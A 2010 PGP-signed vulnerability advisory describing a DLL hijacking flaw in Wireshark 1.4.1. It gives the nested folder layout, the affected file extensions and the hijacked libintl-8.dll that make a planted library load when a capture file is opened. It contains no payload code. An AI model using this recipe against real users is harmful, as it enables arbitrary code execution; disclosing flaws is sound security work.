-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
==========================================================================
==========================================================================
Wireshark 1.4.1 (wireshark.exe) dll hijacking reloaded
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on:
Windows 7 professional full patched
==========================================================================
==========================================================================
DESCRIPTION:
I think this is just a logic flaw, infact this program is still
vulnerable to dll hijacking simply creating, in the same folder of
one of below listed files, these folders:
"%commonprogramfiles%\microsoft shared\windows live"
and then put into "windows live" folder our dll.
E.g.
C:\>dir /S test
Volume in drive C has no label.
Volume Serial Number is XXXX-YYYY
Directory of C:\test
14/10/2010 11:29 <DIR> .
14/10/2010 11:29 <DIR> ..
14/10/2010 11:29 <DIR> %commonprogramfiles%
07/10/2010 13:22 8 test.xspf
1 File(s) 8 bytes
Directory of C:\test\%commonprogramfiles%
14/10/2010 11:29 <DIR> .
14/10/2010 11:29 <DIR> ..
14/10/2010 11:29 <DIR> microsoft shared
0 File(s) 0 bytes
Directory of C:\test\%commonprogramfiles%\microsoft shared
14/10/2010 11:29 <DIR> .
14/10/2010 11:29 <DIR> ..
14/10/2010 11:29 <DIR> windows live
0 File(s) 0 bytes
Directory of C:\test\%commonprogramfiles%\microsoft shared\windows live
14/10/2010 11:29 <DIR> .
14/10/2010 11:29 <DIR> ..
14/10/2010 09:36 14,336 libintl-8.dll
1 File(s) 14,336 bytes
==========================================================================
==========================================================================
INFO:
Prg.: wireshark.exe
Ver.: 1.4.1.34476
Ext.: 5vw
acp
apc
atc
bfr
cap
enc
erf
fdc
pcapng
pcap
pkt
rf5
snoop
syc
tpc
tr1
trace
trc
wpc
wpz
dll: libintl-8.dll
==========================================================================
==========================================================================
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (MingW32)
iQIcBAEBAgAGBQJMtvYiAAoJELleC2c7YdP1As0P/0TCGFrGE810QOZ0I9enE64q
07skJS+m5F2QP5/6J3ACruNrcQV7WMHRGZLJRKRdsIyVelU07vGPNXj7lPkBT7JG
ywYLK+au8Om7+11H2kZM8vG2u96zwsb9CN8rOE5YIZRIVX/5tMM1RjblF+/2jNyz
lRIY2j+7CObVxpdKy3CwOOEvLzk6/NtIlH9m9SVEqTHpLhABZA2t8I0ZIDJu5DD+
fVkZfsRWu2+0eRdb+wHmsLCyv610N84jsCE+BMSH7SAOYGydZrH+j2OrQZ/4pklP
ZIh2Sq9gKw1Pk2EEj49CdOoU813sGVJkHwelUue22NZS8DVN81inO5jfGT+urW+3
02wg5rZBN7L9OjMObfULaFjneV3uOaon/JVVjbDmt1to3ktUUd8SMbEnary3hhU/
1fuSqnz299mFrAZUT+KGkU2M7vG9v5hmbBRSjgRYCGd9agJ7ihwXh0S/EFduDxVW
U6hWrk0t+Sie9XTfuLVLj8N0VWz57NBwXwXJpr1ndmsjonNLK3vFEsKze+WmeBQc
5A5KzJtdg3rXrIJA2RibLLKzaE2sn7h2jsWn1hlSolta8v30Q1GCz+Bp0k3HOC3Q
pqaWHhqvFdZ0CJnu7wl+kSsZA08vsknX0BHWAFdMHPiK5IqCxaxlgfJDmDMb5SHE
dkCtP7fWYbb8gRhA80yH
=AjRX
-----END PGP SIGNATURE-----